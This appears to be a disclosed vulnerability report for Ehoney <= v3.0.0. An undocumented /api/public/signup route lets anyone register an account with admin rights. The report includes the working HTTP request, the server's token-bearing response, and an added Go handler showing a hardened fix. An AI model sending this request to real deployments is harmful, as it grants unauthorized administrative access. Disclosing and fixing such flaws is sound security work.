| Field | Value |
|---|---|
| Title | Ehoney <= v3.0.0 unpublished signup api via /api/public/signup |

## description
In Ehoney <= v3.0.0, there is an unpublished registered route. Any user can register an account through this API and log in. Since there is no permission division, this user has the same management permissions as admin.
## request
```http
POST /api/public/signup HTTP/1.1
Content-Length: 40
Content-Type: application/json
Host: x.x.x.x:8080

{
  "username": "a",
  "password": "a"
}
```
## response
```json
{
  "code": 200,
  "msg": "ok",
  "data": {
    "name": "a",
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo"
  }
}
```
## affected code
https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/controllers/user_handler/uesr.go#L51
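As an added illustration, not the project's own code: a Go net/http handler for the same path that closes the two gaps the report describes, requiring an authenticated admin before an account can be created and giving the new account a least-privilege role instead of admin rights. The in-memory Store, its Tokens map, the "admin-token" value and the "viewer" role are constructed for this example.

```go
package main

import (
	"encoding/json"
	"net/http"
	"strings"
)

// Constructed in-memory store (not the project's storage, not concurrency-safe); Role is "admin" or "viewer".
type User struct{ Name, Role string }
type Store struct {
	Users  map[string]User
	Tokens map[string]string // bearer token -> username, constructed sample
}

func NewStore() *Store {
	return &Store{
		Users:  map[string]User{"admin": {"admin", "admin"}},
		Tokens: map[string]string{"admin-token": "admin"},
	}
}

type signupReq struct {
	Username string `json:"username"`
	Password string `json:"password"` // hashing omitted; not the point here
}
// HardenedSignup closes both gaps the report names: the caller must present a
// token belonging to an existing admin, and the account it creates gets the
// least-privilege role rather than the same rights as admin.
func (s *Store) HardenedSignup(w http.ResponseWriter, r *http.Request) {
	tok := strings.TrimPrefix(r.Header.Get("Authorization"), "Bearer ")
	if caller, ok := s.Users[s.Tokens[tok]]; !ok || caller.Role != "admin" {
		http.Error(w, "forbidden", http.StatusForbidden)
		return
	}
	var req signupReq
	if json.NewDecoder(r.Body).Decode(&req) != nil || req.Username == "" || req.Password == "" {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	if _, exists := s.Users[req.Username]; exists {
		http.Error(w, "conflict", http.StatusConflict) // never overwrite an existing (admin) account
		return
	}
	s.Users[req.Username] = User{req.Username, "viewer"}
	// Same envelope as the report's response, but no token: creating an account
	// for someone else must not log the caller in as that user.
	json.NewEncoder(w).Encode(map[string]interface{}{"code": 200, "msg": "ok"})
}
```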

| Field | Value |
|---|---|
| User | Anonymous User |
| Submitted | 2022-10-28 03:54 (3 years ago) |
| Moderation | 2022-10-28 07:42 (4 hours later) |
| Status | Accepted |
| VulDB entry | 212417 [seccome Ehoney /api/public/signup privilege escalation] |
| Points | 17 |